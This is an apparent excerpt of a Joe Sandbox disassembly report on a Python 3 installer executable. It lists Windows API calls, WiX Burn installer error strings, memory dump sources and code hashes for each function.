                                                                                                                                  • API String ID: 1145190524-3168567549
                                                                                                                                  • Opcode ID: 2f6a134d9f801dd1e7b81dd2165ee9b2140a5257484233b4001851a0f1984f19
                                                                                                                                  • Instruction ID: e18405c0d93ac5bf13b9d05e58d262e88931d0d17e8f44c63a5c33e6adda9291
                                                                                                                                  • Opcode Fuzzy Hash: 2f6a134d9f801dd1e7b81dd2165ee9b2140a5257484233b4001851a0f1984f19
                                                                                                                                  • Instruction Fuzzy Hash: FB31A43B940239ABD7519A998D51FAFBAA8EF84764F11416FFD04EB340D738CD0186E8
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 004A09E6
                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 004A09F0
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A0A14
                                                                                                                                  • Failed to move file pointer 0x%x bytes., xrefs: 004A0A21
                                                                                                                                  • Invalid seek type., xrefs: 004A097C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 2976181284-4208998094
                                                                                                                                  • Opcode ID: 588efafdaa66f12b8464c8a567475504a587d6bdd945792170b7b03a19f3e0ea
                                                                                                                                  • Instruction ID: de1fd03a35a066e8b41e163e5b75065d6c979e25a89ed17020261be816848688
                                                                                                                                  • Opcode Fuzzy Hash: 588efafdaa66f12b8464c8a567475504a587d6bdd945792170b7b03a19f3e0ea
                                                                                                                                  • Instruction Fuzzy Hash: 3F31D276A0021AEFDB10CFA8D885DAEB7A8FF15324B00812AF91497751D338ED11CBD9
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004C3786
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004C37A2
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004C3829
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C3834
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp, xrefs: 004C37B9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp
                                                                                                                                  • API String ID: 760788290-3319182157
                                                                                                                                  • Opcode ID: c8f7aeba76ea7d2ff7fcd316f1467eac154e786eaef412a45b65bc02fd748d15
                                                                                                                                  • Instruction ID: b82927f7f23bdf3823a447966956e1d372242ca340ec676026bd318dac503d3a
                                                                                                                                  • Opcode Fuzzy Hash: c8f7aeba76ea7d2ff7fcd316f1467eac154e786eaef412a45b65bc02fd748d15
                                                                                                                                  • Instruction Fuzzy Hash: 3321A279900119EBCB51EF54C849FAEBBB8EF44B16F11806DF801AB220C739DE00CBA5
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 004C39E9
                                                                                                                                  • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,004EC7A0,00000001,00000000,0048536B,?,?,?,?,?,?), ref: 004C3A21
                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,004EC7A0,?,?,?,?,?,?), ref: 004C3A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FromProg$Initialize
                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                  • API String ID: 4047641309-2356320334
                                                                                                                                  • Opcode ID: 0f7ea7bde7a53796a61745d2f86310fae5a981c2da2cfa1c47df812ca4ab7aec
                                                                                                                                  • Instruction ID: d4f1deee5755695e32f4a09e9768f5ac63dd50808035ffda12f2d584f09ddec1
                                                                                                                                  • Opcode Fuzzy Hash: 0f7ea7bde7a53796a61745d2f86310fae5a981c2da2cfa1c47df812ca4ab7aec
                                                                                                                                  • Instruction Fuzzy Hash: 1AF0A7357482F25BC7D04B666C84F172AA5D751B63F11403FEC82D6160D369D9938AEC
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(004A1188,00000000,00000000,?,?,?,004C042A,004A1188,004A1188,?,00000000,0000FDE9,?,004A1188,8007139F,Invalid operation for this state.), ref: 004C0B8E
                                                                                                                                  • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,004C042A,004A1188,004A1188,?,00000000,0000FDE9,?,004A1188,8007139F), ref: 004C0BCA
                                                                                                                                  • GetLastError.KERNEL32(?,?,004C042A,004A1188,004A1188,?,00000000,0000FDE9,?,004A1188,8007139F,Invalid operation for this state.,c:\agent\_work\138\s\src\burn\engine\cabextract.cpp,000001C7,8007139F), ref: 004C0BD4
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\logutil.cpp, xrefs: 004C0C05
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWritelstrlen
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\logutil.cpp
                                                                                                                                  • API String ID: 606256338-1566132964
                                                                                                                                  • Opcode ID: f367eb2ab085ea2e3323c458e179ad6f881e0a0056866849306bebb51c62d11c
                                                                                                                                  • Instruction ID: 0ec57122eae6c405e05f5cb124fb93a8bfe2549076f04b9c422347ae264d4136
                                                                                                                                  • Opcode Fuzzy Hash: f367eb2ab085ea2e3323c458e179ad6f881e0a0056866849306bebb51c62d11c
                                                                                                                                  • Instruction Fuzzy Hash: 0D118676500235EB8750DBAA9D85FAF7A6CEF44BA5B11032AFD01DB240E764ED40C6E8
                                                                                                                                  APIs
                                                                                                                                  • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,004C090E,?,?,?,?,00000001), ref: 004C025B
                                                                                                                                  • GetLastError.KERNEL32(?,004C090E,?,?,?,?,00000001,?,0048568C,?,?,00000000,?,?,0048540D,00000002), ref: 004C0267
                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,004C090E,?,?,?,?,00000001,?,0048568C,?,?), ref: 004C02D0
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\logutil.cpp, xrefs: 004C0286
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\logutil.cpp
                                                                                                                                  • API String ID: 1365068426-1566132964
                                                                                                                                  • Opcode ID: 1aa12a6c7c5488de3e19cd815eef30492b7cb68836471c57d473d199a02975e7
                                                                                                                                  • Instruction ID: 3015ff420d2c5b94624f53c717eb09dd8d797ce77b37bdecdd7b871888c5b01f
                                                                                                                                  • Opcode Fuzzy Hash: 1aa12a6c7c5488de3e19cd815eef30492b7cb68836471c57d473d199a02975e7
                                                                                                                                  • Instruction Fuzzy Hash: 0C11BF3A600225EBDF619F91CD0AFEF7A68EF54751F01405EFD05AA260D7348E50D6A4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004A12C5: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004A08DA,?,?,?), ref: 004A12ED
                                                                                                                                    • Part of subcall function 004A12C5: GetLastError.KERNEL32(?,004A08DA,?,?,?), ref: 004A12F7
                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 004A08E8
                                                                                                                                  • GetLastError.KERNEL32 ref: 004A08F2
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A0916
                                                                                                                                  • Failed to read during cabinet extraction., xrefs: 004A0920
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                  • String ID: Failed to read during cabinet extraction.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 2170121939-2593745101
                                                                                                                                  • Opcode ID: edcac67ea1bb582a0cdebd7b8bcfb3735d8c750ca9d942a7dbc7f73b9558e94f
                                                                                                                                  • Instruction ID: f40745bccc0931a8e123cf9cfcef325399c7338eced0ff63ec79e6780fa79260
                                                                                                                                  • Opcode Fuzzy Hash: edcac67ea1bb582a0cdebd7b8bcfb3735d8c750ca9d942a7dbc7f73b9558e94f
                                                                                                                                  • Instruction Fuzzy Hash: DF01A576A01269EBDB119F95DC05E8B7BA8FF057A4F11011AFD04A7251D734D910C6D8
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004A08DA,?,?,?), ref: 004A12ED
                                                                                                                                  • GetLastError.KERNEL32(?,004A08DA,?,?,?), ref: 004A12F7
                                                                                                                                  Strings
                                                                                                                                  • Failed to move to virtual file pointer., xrefs: 004A1325
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A131B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID: Failed to move to virtual file pointer.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 2976181284-2495663704
                                                                                                                                  • Opcode ID: a665705c9137ac0a41e4a94f82038bbfdf841b7e846e9a564407a6b4dd19ab95
                                                                                                                                  • Instruction ID: 904bc41ede3e7d127cf5653d6b8c1e5c040d0886ac5f4ecee455d3c417177d60
                                                                                                                                  • Opcode Fuzzy Hash: a665705c9137ac0a41e4a94f82038bbfdf841b7e846e9a564407a6b4dd19ab95
                                                                                                                                  • Instruction Fuzzy Hash: DC01A737501636B7DB211E969C09E8BFF15EF51B71B11812BFD1856620D729DC2087DC
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,004855CA,?,?,?,?,?,?), ref: 00485076
                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,004855CA,?,?,?,?,?,?), ref: 0048508A
                                                                                                                                  • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004855CA,?,?), ref: 00485179
                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004855CA,?,?), ref: 00485180
                                                                                                                                    • Part of subcall function 0048115F: LocalFree.KERNEL32(?,?,00485033,?,00000000,?,004855CA,?,?,?,?,?,?), ref: 00481169
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3671900028-0
                                                                                                                                  • Opcode ID: 782882dc1f106b28faa60ef4ec42cf2725d30a0c30e477863bb1d72241bd2083
                                                                                                                                  • Instruction ID: e3e89dc1a4f76a548f94032977102b00472bea7f7248a154dd2a80a8ece73166
                                                                                                                                  • Opcode Fuzzy Hash: 782882dc1f106b28faa60ef4ec42cf2725d30a0c30e477863bb1d72241bd2083
                                                                                                                                  • Instruction Fuzzy Hash: 504194B1900B05ABCA60BAB6C889F9F73ACAF04344F440D2EB26AD3151DB78E544876C
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0048F9F9: RegCloseKey.KERNELBASE(00000000,?,?,00000001,00000000,00000000,?,?,00484D23,?,?,00000001), ref: 0048FA49
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00484D8A
                                                                                                                                  Strings
                                                                                                                                  • Failed to get current process path., xrefs: 00484D48
                                                                                                                                  • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00484D74
                                                                                                                                  • Unable to get resume command line from the registry, xrefs: 00484D29
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Handle
                                                                                                                                  • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                                                                                  • API String ID: 187904097-642631345
                                                                                                                                  • Opcode ID: 7dbef359a2b940ce47d92f5b14498ce8f6318f7afc91fe795673e65bde04a5f9
                                                                                                                                  • Instruction ID: 071252d73158980bd1ff48b52fb962ff5c6d9578a24a4ecad6e83f7128fa9646
                                                                                                                                  • Opcode Fuzzy Hash: 7dbef359a2b940ce47d92f5b14498ce8f6318f7afc91fe795673e65bde04a5f9
                                                                                                                                  • Instruction Fuzzy Hash: F3117275D00129FB8B12BF9AD801D9EBBF8EF90710B10456BE915B6210D7399B409B88
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004C15E7
                                                                                                                                  • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 004C161F
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\regutil.cpp, xrefs: 004C165B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\regutil.cpp
                                                                                                                                  • API String ID: 3660427363-3069916640
                                                                                                                                  • Opcode ID: 77ba72c5438223c864c3837cf0ef7a798cb34f924078e42bd90c8c03e5f6f2db
                                                                                                                                  • Instruction ID: 640edd78781aae4821f815aef884cfee6538bba0042a9eedb0e9ac50d7025bc4
                                                                                                                                  • Opcode Fuzzy Hash: 77ba72c5438223c864c3837cf0ef7a798cb34f924078e42bd90c8c03e5f6f2db
                                                                                                                                  • Instruction Fuzzy Hash: 8241C435E0011AFBDB109F95C981EAFBBB9AF02754F14456FE900E7221D7388E11DB98
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00481104,?,?,00000000), ref: 004851BA
                                                                                                                                  • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00481104,?,?,00000000), ref: 004851EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareStringlstrlen
                                                                                                                                  • String ID: burn.clean.room
                                                                                                                                  • API String ID: 1433953587-3055529264
                                                                                                                                  • Opcode ID: 8bd74b4f9cb56aa958247fdb5f095987eae7fe371f465b94d4150cf4a833696d
                                                                                                                                  • Instruction ID: 7c6630ed1947ebd52c4f49ddbc237ce503bea22fdb2cd5bbc0f889bf4384907c
                                                                                                                                  • Opcode Fuzzy Hash: 8bd74b4f9cb56aa958247fdb5f095987eae7fe371f465b94d4150cf4a833696d
                                                                                                                                  • Instruction Fuzzy Hash: 6301D672900624AAC7206B89ECC9D7BBBACEB187907504527E904CB724C724AC40CBEC
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0048394B
                                                                                                                                  • GetLastError.KERNEL32 ref: 00483955
                                                                                                                                  • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 004839BE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1230559179-0
                                                                                                                                  • Opcode ID: fbda063252a08ac9b36a583755bdfb4ce7aa961fbe8c0fdd86a7082f97d7bc2f
                                                                                                                                  • Instruction ID: 325ce0749e57fa1ae6a817963c1ec44fd26b45ebfde222667a8b3a8adf580d5c
                                                                                                                                  • Opcode Fuzzy Hash: fbda063252a08ac9b36a583755bdfb4ce7aa961fbe8c0fdd86a7082f97d7bc2f
                                                                                                                                  • Instruction Fuzzy Hash: 462106F6D01329A7CB20AF658C46F9F7768AB00B11F100966ED44E7241D6B8DE448BD8
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,004C06D5,00000000,8007139F,?,00000000,00000000,8007139F,?,?,?,004C0669,000001C7), ref: 00483AE9
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,004C06D5,00000000,8007139F,?,00000000,00000000,8007139F,?,?,?,004C0669,000001C7,?,?), ref: 00483AF0
                                                                                                                                  • GetLastError.KERNEL32(?,004C06D5,00000000,8007139F,?,00000000,00000000,8007139F,?,?,?,004C0669,000001C7,?,?), ref: 00483AFA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 406640338-0
                                                                                                                                  • Opcode ID: 30b328fa01cff3fbf5cff55a929ca714e093c1b24885eed0d63aff0b64d33a3b
                                                                                                                                  • Instruction ID: 3ed00dcda97b684ba3336a16543655db6e7af2e743a948efebd2d231758a61b1
                                                                                                                                  • Opcode Fuzzy Hash: 30b328fa01cff3fbf5cff55a929ca714e093c1b24885eed0d63aff0b64d33a3b
                                                                                                                                  • Instruction Fuzzy Hash: 71D08C73A0023553C2202BA65C1D94B7E58EB00AA2B014032F904D6200C625980083E8
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004C3A6D
                                                                                                                                    • Part of subcall function 004C34D0: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,004C3A7E,00000000,?,00000000), ref: 004C34EA
                                                                                                                                    • Part of subcall function 004C34D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004ABE27,?,?,?,00000000,?), ref: 004C34F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                  • String ID: 5TH
                                                                                                                                  • API String ID: 52713655-2066853787
                                                                                                                                  • Opcode ID: 0e00d54f9c769f8353c7a7deeeae24461db02d629d400a3d1184c6be9e9c18a1
                                                                                                                                  • Instruction ID: d5636a18ab1317e8fa19ca23767815b71ff3577ede77cb3cf586755a375f5717
                                                                                                                                  • Opcode Fuzzy Hash: 0e00d54f9c769f8353c7a7deeeae24461db02d629d400a3d1184c6be9e9c18a1
                                                                                                                                  • Instruction Fuzzy Hash: 53312F76E006299BCB11DFA9C884EDEB7B8EF08711F01856AED15FB311D674AD048BA4
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\regutil.cpp, xrefs: 004C1487
                                                                                                                                  Memory Dump Source
